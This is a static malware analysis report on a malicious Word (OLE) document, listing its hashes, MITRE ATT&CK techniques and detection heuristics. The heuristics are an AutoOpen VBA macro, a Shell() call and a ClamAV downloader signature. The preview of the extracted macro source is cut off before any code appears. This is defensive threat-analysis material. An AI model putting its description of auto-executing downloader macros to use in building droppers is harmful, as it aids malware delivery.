Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e306487016eee1e1…

MALICIOUS

Office (OLE)

Size: 132.4 KB
Created: 2018-09-26 07:52:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: c44e2116a552e2fead7351dd5481b1b6
SHA-1: a27e489ba39030ed518b67a8e40ae3536f6d11ec
SHA-256: e306487016eee1e1acca4a65c56df5c8436aa63e15700eba3b55084e1f453e73
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and the Shell() function is called, indicating an attempt to execute arbitrary code. The macro likely downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader'. No specific family could be identified.

Heuristics (6)

  • ClamAV: Doc.Downloader.00536d-6697991-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.00536d-6697991-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 98169 bytes
SHA-256: 2a6166d6600eeeafed054950b38ffe0cc8def3fd85094ae45898adcdd6aa9acf
Preview script
First 1,000 lines of the extracted script